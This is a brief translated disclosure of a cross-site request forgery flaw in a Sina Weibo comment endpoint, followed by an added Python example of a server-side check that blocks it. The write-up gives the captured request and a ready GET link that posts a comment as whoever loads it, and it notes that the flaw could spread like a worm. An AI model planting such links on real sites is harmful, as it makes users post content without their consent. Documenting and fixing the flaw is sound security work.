
A Loosely Controlled Feature on Sina Weibo Could Lead to a Worm

Source: Internet  Author: Anonymous  Time: 2016-05-07 10:05
1) The problematic feature is the comment function on lady.weibo.com;

2) Click "publish" and capture the traffic; the following request is obtained:

POST /cmnt/submit HTTP/1.1
Host: comment5.news.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://slide.eladies.sina.com.cn/fa/slide_3_41261_19668.html
Cookie: 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 292
 
channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg
 
3) The system checks the Referer, but it turns out the same submission can be sent directly as a GET request:

http://comment5.news.sina.com.cn/cmnt/submit?channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg
 
4) The result of the submission is shown in the figure below;

5) Posting the URL above on Weibo shows that the system also checks the Referer on GET requests;

6) However, the URL can be posted in the following scenario;

7) The effect is shown in the figure below; in addition, the "share_url" and "image_url" parameters appear to be freely definable by the submitter....

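As an added example (not part of the write-up and not Sina's code), the server-side gate a defender would put in front of an endpoint like /cmnt/submit, written in Python: refuse state changes over GET, require an allow-listed Origin/Referer, and bind the request to a per-session token. The allow-listed hosts, the session token and the function names are assumptions.

```python
import hmac
from urllib.parse import urlsplit

# Hypothetical hardened gate for a comment-submit endpoint such as the
# /cmnt/submit request captured in the write-up. Allow-listed hosts are
# constructed for this example; the application is assumed to hold a
# per-session CSRF token and pass it to check_submit().
ALLOWED_ORIGINS = {"slide.eladies.sina.com.cn", "lady.weibo.com"}

def _host_of(url):
    """Hostname of a URL, or "" if it cannot be parsed."""
    try:
        return urlsplit(url).hostname or ""
    except ValueError:
        return ""

def check_submit(method, headers, form, session_token):
    """Return (allowed, reason). Closes the three gaps the write-up shows:
    state change over GET, Referer as the only anti-CSRF signal, no token."""
    # 1. A comment submission changes state, so only POST is accepted.
    #    The GET form of the captured request fails here whatever its Referer.
    if method.upper() != "POST":
        return False, "method not allowed"
    # 2. Origin (preferred) or Referer must name an allow-listed host.
    #    Referer alone is weak: the link can be planted on a same-origin page.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if _host_of(source) not in ALLOWED_ORIGINS:
        return False, "bad origin"
    # 3. Synchronizer token tied to the session, compared in constant time.
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token, session_token):
        return False, "missing or invalid csrf token"
    return True, "ok"

# Constructed sample data mirroring the fields of the captured request.
CAPTURED_FORM = {"channel": "shuo", "newsid": "slidenews-41261-277122",
                 "parent": "B", "content": "very nice", "format": "js", "ispost": "1"}
SESSION_TOKEN = "constructed-session-token"
REFERER = {"Referer": "http://slide.eladies.sina.com.cn/fa/slide_3_41261_19668.html"}

def demo():
    """Run the gate over the cases from the write-up plus a legitimate one."""
    with_token = {**CAPTURED_FORM, "csrf_token": SESSION_TOKEN}
    return {
        "get_with_referer": check_submit("GET", REFERER, CAPTURED_FORM, SESSION_TOKEN),
        "post_no_token": check_submit("POST", REFERER, CAPTURED_FORM, SESSION_TOKEN),
        "post_with_token": check_submit("POST", REFERER, with_token, SESSION_TOKEN),
        "cross_site_post": check_submit("POST", {"Origin": "http://evil.example"}, with_token, SESSION_TOKEN),
    }
```

Only the POST that carries the session-bound token from an allow-listed origin passes; the write-up's GET link is rejected before the Referer is even consulted.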
